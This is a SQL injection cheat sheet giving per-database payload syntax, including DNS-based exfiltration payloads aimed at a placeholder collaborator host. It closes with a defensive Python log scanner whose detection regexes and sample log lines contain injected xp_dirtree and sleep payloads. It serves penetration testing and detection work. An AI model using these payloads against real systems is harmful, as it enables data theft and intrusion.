sql injection cheat sheet
A SQL injection cheat sheet is a powerful tool for web application penetration tests. It follows a modular approach and can be used for various tasks: post-exploitation, database enumeration, data retrieval, etc.
String concatenation
on Jun 05, 2022

Oracle:      'foo'||'bar'
Microsoft:   'foo'+'bar'
PostgreSQL:  'foo'||'bar'
MySQL:       'foo' 'bar'  [Note the space between the two strings]
             CONCAT('foo','bar')
Substring

Oracle:      SUBSTR('foobar', 4, 2)
Microsoft:   SUBSTRING('foobar', 4, 2)
PostgreSQL:  SUBSTRING('foobar', 4, 2)
MySQL:       SUBSTRING('foobar', 4, 2)
Comments

Oracle:      --comment
Microsoft:   --comment
             /*comment*/
PostgreSQL:  --comment
             /*comment*/
MySQL:       #comment
             -- comment  [Note the space after the double dash]
             /*comment*/
Database version

Oracle:      SELECT banner FROM v$version
             SELECT version FROM v$instance
Microsoft:   SELECT @@version
PostgreSQL:  SELECT version()
MySQL:       SELECT @@version
Database contents

Oracle:      SELECT * FROM all_tables
             SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'
Microsoft:   SELECT * FROM information_schema.tables
             SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
PostgreSQL:  SELECT * FROM information_schema.tables
             SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
MySQL:       SELECT * FROM information_schema.tables
             SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
Conditional errors

Oracle:      SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN to_char(1/0) ELSE NULL END FROM dual
Microsoft:   SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END
PostgreSQL:  SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN cast(1/0 as text) ELSE NULL END
MySQL:       SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a')
Batched (or stacked) queries

Oracle:      Does not support batched queries.
Microsoft:   QUERY-1-HERE; QUERY-2-HERE
PostgreSQL:  QUERY-1-HERE; QUERY-2-HERE
MySQL:       QUERY-1-HERE; QUERY-2-HERE
Time delays
on May 06, 2022

Oracle:      dbms_pipe.receive_message(('a'),10)
Microsoft:   WAITFOR DELAY '0:0:10'
PostgreSQL:  SELECT pg_sleep(10)
MySQL:       SELECT sleep(10)
DNS lookup

Oracle:      The following technique leverages an XML external entity (XXE) vulnerability to trigger a DNS lookup. The vulnerability has been patched, but there are many unpatched Oracle installations in existence:
             SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual
             The following technique works on fully patched Oracle installations, but requires elevated privileges:
             SELECT UTL_INADDR.get_host_address('BURP-COLLABORATOR-SUBDOMAIN')
Microsoft:   exec master..xp_dirtree '//BURP-COLLABORATOR-SUBDOMAIN/a'
PostgreSQL:  copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN'
MySQL:       The following techniques work on Windows only:
             LOAD_FILE('\\\\BURP-COLLABORATOR-SUBDOMAIN\\a')
             SELECT ... INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'
DNS lookup with data exfiltration

Oracle:      SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT YOUR-QUERY-HERE)||'.BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual
Microsoft:   declare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);exec('master..xp_dirtree "//'+@p+'.BURP-COLLABORATOR-SUBDOMAIN/a"')
PostgreSQL:  create OR replace function f() returns void as $$
             declare c text;
             declare p text;
             begin
             SELECT into p (SELECT YOUR-QUERY-HERE);
             c := 'copy (SELECT '''') to program ''nslookup '||p||'.BURP-COLLABORATOR-SUBDOMAIN''';
             execute c;
             END;
             $$ language plpgsql security definer;
             SELECT f();
MySQL:       The following technique works on Windows only:
             SELECT YOUR-QUERY-HERE INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'
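The same platform-specific syntax is what a defender looks for in traffic. As an added example that is not part of the cheat sheet, the Python scanner below maps the time-delay, DNS-lookup, conditional-error, enumeration and stacked-query fingerprints listed above onto URL-decoded web-server log lines; the signature regexes, the access-log lines and the x.example hostname are all constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Signatures derived from the platform-specific syntax in the sections above.
# The regexes are constructed for this example and run against URL-decoded text.
SIGNATURES = [
    ("MySQL",      "time delay",         r"\bsleep\s*\(\s*\d+"),
    ("PostgreSQL", "time delay",         r"\bpg_sleep\s*\("),
    ("Microsoft",  "time delay",         r"\bwaitfor\s+delay\b"),
    ("Oracle",     "time delay",         r"\bdbms_pipe\.receive_message\b"),
    ("Microsoft",  "DNS lookup",         r"\bxp_dirtree\b"),
    ("Oracle",     "DNS lookup",         r"\butl_inaddr\.get_host_address\b|\bextractvalue\s*\(\s*xmltype\b"),
    ("PostgreSQL", "DNS lookup",         r"\bcopy\b.*\bto\s+program\b"),
    ("MySQL",      "DNS lookup",         r"\bload_file\s*\(|\binto\s+outfile\b"),
    ("Oracle",     "conditional error",  r"\bto_char\s*\(\s*1\s*/\s*0\s*\)"),
    ("any",        "version probe",      r"@@version\b|\bv\$version\b|\bversion\s*\(\s*\)"),
    ("any",        "schema enumeration", r"\binformation_schema\.(?:tables|columns)\b|\ball_tab(?:les|_columns)\b"),
    ("any",        "stacked query",      r";\s*(?:select|exec|insert|update|delete|drop|copy|declare)\b"),
]
COMPILED = [(p, t, re.compile(rx, re.IGNORECASE)) for p, t, rx in SIGNATURES]


def scan_text(raw):
    """Return the (platform, technique) pairs whose signature matches one request string."""
    # Decode twice: injected payloads are frequently double URL-encoded to slip past filters.
    decoded = unquote_plus(unquote_plus(raw))
    return [(p, t) for p, t, rx in COMPILED if rx.search(decoded)]


def scan_log(lines):
    """Map line index -> hits for every log line that matches at least one signature."""
    report = {}
    for i, line in enumerate(lines):
        hits = scan_text(line)
        if hits:
            report[i] = hits
    return report


# Constructed access-log lines (not real traffic); x.example is a placeholder hostname.
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Jun/2022:10:00:01] "GET /product?id=42 HTTP/1.1" 200',
    '10.0.0.7 - - [05/Jun/2022:10:00:02] "GET /product?id=42%27%20AND%20%28SELECT%20sleep%2810%29%29--%20 HTTP/1.1" 200',
    '10.0.0.7 - - [05/Jun/2022:10:00:03] "GET /product?id=42;exec%20master..xp_dirtree%20%27//x.example/a%27 HTTP/1.1" 500',
    '10.0.0.9 - - [05/Jun/2022:10:00:04] "GET /search?q=sleepy+cat+version HTTP/1.1" 200',
]

if __name__ == "__main__":
    for idx, hits in scan_log(SAMPLE_LOG).items():
        print(idx, hits)
```

The word-boundary anchors keep benign text such as "sleepy" or a bare "version" from firing, which is the usual source of noise in keyword-only SQLi rules.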